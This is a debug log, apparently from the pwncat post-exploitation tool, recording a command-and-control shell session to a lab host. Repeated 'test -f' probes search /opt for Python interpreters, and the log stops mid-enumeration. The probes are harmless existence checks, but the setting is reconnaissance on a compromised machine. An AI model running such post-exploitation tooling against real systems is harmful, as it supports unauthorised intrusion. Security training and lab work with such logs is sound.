2020-06-12 15:46:50,138 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,279 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,279 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2.7
2020-06-12 15:46:50,279 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,279 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2.7 && echo /opt/python2.7/bin/python2.7 || echo;\n'
2020-06-12 15:46:50,279 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,311 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,311 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3
2020-06-12 15:46:50,312 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,312 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3 && echo /opt/python2.7/bin/python3 || echo;\n'
2020-06-12 15:46:50,312 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,397 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,398 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.5
2020-06-12 15:46:50,398 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,398 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.5 && echo /opt/python2.7/bin/python3.5 || echo;\n'
2020-06-12 15:46:50,398 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,440 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,440 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.6
2020-06-12 15:46:50,440 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,440 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.6 && echo /opt/python2.7/bin/python3.6 || echo;\n'
2020-06-12 15:46:50,440 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,492 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,492 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.7
2020-06-12 15:46:50,493 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,493 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.7 && echo /opt/python2.7/bin/python3.7 || echo;\n'
2020-06-12 15:46:50,493 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,692 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,693 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.8
2020-06-12 15:46:50,693 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,693 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.8 && echo /opt/python2.7/bin/python3.8 || echo;\n'
2020-06-12 15:46:50,694 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,720 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,721 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python
2020-06-12 15:46:50,721 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,722 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python && echo /opt/python3/bin/python || echo;\n'
2020-06-12 15:46:50,722 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,897 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,897 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2
2020-06-12 15:46:50,898 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,898 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2 && echo /opt/python3/bin/python2 || echo;\n'
2020-06-12 15:46:50,898 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,987 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,987 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2.7
2020-06-12 15:46:50,987 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,987 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2.7 && echo /opt/python3/bin/python2.7 || echo;\n'
2020-06-12 15:46:50,987 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,016 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,016 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3
2020-06-12 15:46:51,016 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,016 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3 && echo /opt/python3/bin/python3 || echo;\n'
2020-06-12 15:46:51,016 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,060 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,060 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.5
2020-06-12 15:46:51,061 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,061 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.5 && echo /opt/python3/bin/python3.5 || echo;\n'
2020-06-12 15:46:51,061 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,085 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,086 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.6
2020-06-12 15:46:51,086 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,086 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.6 && echo /opt/python3/bin/python3.6 || echo;\n'
2020-06-12 15:46:51,086 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,119 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,119 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.7
2020-06-12 15:46:51,119 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,119 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.7 && echo /opt/python3/bin/python3.7 || echo;\n'
2020-06-12 15:46:51,119 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,336 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,336 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.8
2020-06-12 15:46:51,336 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,337 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.8 && echo /opt/python3/bin/python3.8 || echo;\n'
2020-06-12 15:46:51,337 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,367 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,368 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python
2020-06-12 15:46:51,368 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,368 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python && echo /opt/python3.5/bin/python || echo;\n'
2020-06-12 15:46:51,368 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,510 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,510 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2
2020-06-12 15:46:51,510 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,510 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2 && echo /opt/python3.5/bin/python2 || echo;\n'
2020-06-12 15:46:51,510 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,537 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,537 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2.7
2020-06-12 15:46:51,537 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,537 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2.7 && echo /opt/python3.5/bin/python2.7 || echo;\n'
2020-06-12 15:46:51,537 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,598 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,599 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3
2020-06-12 15:46:51,599 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,599 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3 && echo /opt/python3.5/bin/python3 || echo;\n'
2020-06-12 15:46:51,599 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,625 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,625 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.5
2020-06-12 15:46:51,626 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,626 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.5 && echo /opt/python3.5/bin/python3.5 || echo;\n'
2020-06-12 15:46:51,626 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,652 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,653 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.6
2020-06-12 15:46:51,653 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,653 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.6 && echo /opt/python3.5/bin/python3.6 || echo;\n'
2020-06-12 15:46:51,653 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,677 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,678 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.7
2020-06-12 15:46:51,678 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,678 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.7 && echo /opt/python3.5/bin/python3.7 || echo;\n'
2020-06-12 15:46:51,678 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,704 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,704 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.8
2020-06-12 15:46:51,704 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,704 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.8 && echo /opt/python3.5/bin/python3.8 || echo;\n'
2020-06-12 15:46:51,704 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,729 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,729 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python
2020-06-12 15:46:51,729 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,729 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python && echo /opt/python3.6/bin/python || echo;\n'
2020-06-12 15:46:51,729 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,922 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,922 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2
2020-06-12 15:46:51,922 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,923 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2 && echo /opt/python3.6/bin/python2 || echo;\n'
2020-06-12 15:46:51,923 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,948 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,948 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2.7
2020-06-12 15:46:51,948 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,949 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2.7 && echo /opt/python3.6/bin/python2.7 || echo;\n'
2020-06-12 15:46:51,949 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:51,979 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:51,980 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3
2020-06-12 15:46:51,980 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:51,980 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3 && echo /opt/python3.6/bin/python3 || echo;\n'
2020-06-12 15:46:51,980 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,123 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,123 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.5
2020-06-12 15:46:52,123 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,123 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.5 && echo /opt/python3.6/bin/python3.5 || echo;\n'
2020-06-12 15:46:52,123 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,217 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,218 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.6
2020-06-12 15:46:52,218 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,218 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.6 && echo /opt/python3.6/bin/python3.6 || echo;\n'
2020-06-12 15:46:52,218 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,244 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,244 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.7
2020-06-12 15:46:52,245 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,245 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.7 && echo /opt/python3.6/bin/python3.7 || echo;\n'
2020-06-12 15:46:52,245 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,297 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,297 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.8
2020-06-12 15:46:52,297 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,297 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.8 && echo /opt/python3.6/bin/python3.8 || echo;\n'
2020-06-12 15:46:52,297 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,324 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,325 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python
2020-06-12 15:46:52,325 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,325 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python && echo /opt/python3.7/bin/python || echo;\n'
2020-06-12 15:46:52,325 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,354 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,354 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2
2020-06-12 15:46:52,354 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,354 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2 && echo /opt/python3.7/bin/python2 || echo;\n'
2020-06-12 15:46:52,354 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,504 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,504 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2.7
2020-06-12 15:46:52,505 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,505 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2.7 && echo /opt/python3.7/bin/python2.7 || echo;\n'
2020-06-12 15:46:52,505 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,532 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,532 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3
2020-06-12 15:46:52,533 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,533 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3 && echo /opt/python3.7/bin/python3 || echo;\n'
2020-06-12 15:46:52,533 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,558 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,558 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.5
2020-06-12 15:46:52,558 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,558 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.5 && echo /opt/python3.7/bin/python3.5 || echo;\n'
2020-06-12 15:46:52,558 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,584 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,585 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.6
2020-06-12 15:46:52,585 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,585 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.6 && echo /opt/python3.7/bin/python3.6 || echo;\n'
2020-06-12 15:46:52,585 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,615 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,615 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.7
2020-06-12 15:46:52,615 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,616 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.7 && echo /opt/python3.7/bin/python3.7 || echo;\n'
2020-06-12 15:46:52,616 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,736 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,737 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.8
2020-06-12 15:46:52,737 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,737 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.8 && echo /opt/python3.7/bin/python3.8 || echo;\n'
2020-06-12 15:46:52,737 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,766 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,766 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python
2020-06-12 15:46:52,766 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,766 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python && echo /opt/python3.8/bin/python || echo;\n'
2020-06-12 15:46:52,766 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,793 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,794 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2
2020-06-12 15:46:52,794 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,794 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2 && echo /opt/python3.8/bin/python2 || echo;\n'
2020-06-12 15:46:52,794 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,820 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,820 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2.7
2020-06-12 15:46:52,820 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,820 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2.7 && echo /opt/python3.8/bin/python2.7 || echo;\n'
2020-06-12 15:46:52,820 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,848 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,848 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3
2020-06-12 15:46:52,848 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,848 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3 && echo /opt/python3.8/bin/python3 || echo;\n'
2020-06-12 15:46:52,848 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,877 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,877 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.5
2020-06-12 15:46:52,877 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,877 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.5 && echo /opt/python3.8/bin/python3.5 || echo;\n'
2020-06-12 15:46:52,877 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,909 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,909 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.6
2020-06-12 15:46:52,909 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,909 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.6 && echo /opt/python3.8/bin/python3.6 || echo;\n'
2020-06-12 15:46:52,909 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,956 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
